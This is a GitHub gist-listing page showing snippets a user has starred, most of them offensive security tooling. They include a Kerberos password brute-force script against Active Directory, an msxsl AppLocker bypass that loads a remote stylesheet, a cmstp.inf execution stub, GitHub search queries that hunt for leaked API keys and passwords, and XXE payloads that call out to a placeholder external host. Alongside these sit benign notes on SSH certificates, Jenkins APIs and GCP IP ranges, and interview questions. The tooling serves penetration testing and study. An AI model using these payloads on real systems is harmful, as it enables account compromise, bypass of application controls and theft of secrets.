Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

917 followers · 127 following
View GitHub Profile
@ropnop
ropnop / kinit_brute.sh
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
@cmc
cmc / YubiHSM2 Backed SSH Certificates
Last active October 8, 2021 12:25
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!]
1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/
2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine.
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine.
3. Update /etc/ssh/sshd_config on remote server to add:
TrustedUserCAKeys /etc/ssh/ca.pub
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
4. Add principals here:
ex:
@bohops
bohops / xsl-notepad.xml
Last active September 26, 2022 23:29
XSL Testing (++++++ netbiosX and subTee) - https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@lizrice
lizrice / kubelet-api.md
Last active March 15, 2023 12:13
Checking Kubelet API access

Accessing Kubelet API

curl -sk https://localhost:10250/pods/
  • If --anonymous-auth is turned off, you will see a 401 Unauthorized response.
  • If --anonymous-auth is true and --authorization-mode is Webhook you'll see 403 Forbidden response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
  • If --anonymous-auth is true and --authorization-mode is AlwaysAllow you'll see a list of pods.
@justlaputa
justlaputa / jenkins-api.md
Last active September 26, 2023 17:43
Jenkins Json API

jobs

jenkins_url + /api/json?tree=jobs[name,color]

builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

@NickTyrer
NickTyrer / cmstp.inf
Last active January 5, 2024 13:16
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@nullenc0de
nullenc0de / auto_git_query
Last active January 6, 2024 15:08
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@namishelex01
namishelex01 / Security Engineer - Interview Questions.md
Last active February 28, 2024 03:47
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names

Core Information Security

  • What is information security and how is it achieved?

  • What are the core principles of information security?

  • What is the CIA triangle?

  • What is non-repudiation (as it applies to IT security)?

@n0531m
n0531m / list_gcp_iprange.sh
Last active April 17, 2024 21:50
Google Cloud Platform : ip address range
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`
@staaldraad
staaldraad / XXE_payloads
Last active April 29, 2024 14:27
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>